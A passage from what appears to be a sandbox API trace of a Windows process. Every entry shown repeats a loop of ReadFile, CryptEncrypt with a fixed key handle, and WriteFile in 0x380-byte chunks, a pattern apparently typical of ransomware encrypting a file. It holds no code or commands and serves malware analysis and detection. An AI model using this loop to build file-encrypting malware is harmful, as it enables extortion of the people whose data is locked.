lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.366] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.366] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.366] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.366] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.366] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.367] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.367] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.367] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.367] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.367] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.367] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.367] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.367] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.367] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.367] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.367] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.367] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.367] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.368] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.368] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.369] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.369] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.369] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.369] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.369] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.369] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.370] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.370] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.370] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.370] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.370] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.370] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.370] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.370] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.370] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.370] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.370] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.370] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.371] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.371] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.371] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.371] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.371] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.372] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.372] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.372] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.372] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.372] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.372] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.372] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.372] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.372] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.372] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.372] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.372] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.372] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.373] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.373] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.373] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.373] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.373] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.373] ReadFile (in: 